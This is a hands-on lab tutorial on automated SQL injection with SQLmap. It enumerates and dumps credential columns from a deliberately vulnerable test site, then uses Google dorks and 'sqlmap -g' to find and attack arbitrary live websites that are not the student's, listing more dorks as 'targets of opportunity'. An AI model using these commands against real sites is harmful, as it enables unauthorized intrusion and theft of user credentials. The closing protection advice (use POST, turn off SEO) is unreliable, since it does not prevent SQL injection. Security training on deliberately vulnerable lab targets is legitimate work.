Overview
In this lab, students will learn to perform an automated SQL injection attack using SQLmap.
SQLmap
Straight from the source….
SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting over data fetching from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Lab Requirements
- One virtual install of Kali Linux with an Internet connection.
Begin the lab!
Open a terminal, and at the prompt, type, sqlmap -h. This will list the commands supported by SqlMap.
We begin by executing a simple query of a potential target running a web application using SQL.
At the terminal prompt, type:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Be sure to read everything in the output. There’s a lot of good information returned. Notice the use of the union query use to combine two or more SQL statements. Also, note how the null command was used to locate database information from the backend of the SQL server.
We hope to capture some information about the version of SQL running and version information.
SQLmap may ask questions during the enumeration of the target. When in doubt about how best to answer, type in a ‘y’ for yes.
In our next step, we gather information about the existing databases. We will add –dbs to the end of our previous command to do this.
Tip! Remember to use your up arrow to see your command history—type in space, two single dashes (–) followed by dbs.
Two databases were identified.
We are now ready to obtain information about what the acuart database holds. We need to view the tables in the database to get this information. We will use the -D switch telling Sqlmap to find the tables inside the acuart database.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables
We are shown the tables present in the database.
We next need to tell SQLmap to show the columns present in the table named users inside the acuart database. Use your up arrow and add the needed commands.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns
We are shown the columns in the user table inside the acuart database.
Let’s have SQLmap show us the contents of the following columns of information using the following command.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass –dump
We are given the email address, the name, and the password for the account.
Summary
Using an automated tool such as SQLmap makes performing a SQL injection attack painless. We can use what we have demonstrated here using a test site and replace the URL for the site with any web address running a vulnerable web application attached to an SQL database.
The question that remains is how we locate these vulnerable web applications. The answer is by using something called Google Dorks. Google is just an extensive search engine. The information it stores is data-driven which means it uses a database of some type.
The Dork part refers to the SQL or website administrator who failed to secure their database from SQL injection attacks.
Open a Google search engine and type the following:
inurl:”products.php?prodID=”
You should be able to read the query and discern that we are looking for any URL that contains the following information. When we wrap in quotes, we tell Google precisely what to search for.
My search results show 5,920 URLs that contain this string.
We can use SQLmap to search us.
sqlmap -g “inurl:\”products.php?prodID=1\””
SQLmap scans the URL of the website that fits the criteria of our search.
This time, the attack failed, but there were plenty more targets. As a Pentester, this is another tool we can use to test for vulnerable web applications. Typically, we would conduct a vulnerability scan using a web application vulnerability scanner like Vega. If the results are positive for a SQL injection attack, we would ask permission to try to exploit the target.
Type in the following Google Dorks one line at a time to search for more targets of opportunities.
allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
Locating the latest Google Dorks
Google Hacking Database (GHDB)
How can we protect our DB against SQLMap? One solution might be to use the POST method instead of GET so sensitive data will not be visible in a browser. Also, use string escape against SQL injection. Another might be turning off Search Engine Optimization (SEO) for all vulnerable endpoints after the main domain, allowing www.domain.com to be searched, but everything after / will not be searched.
End of the lab!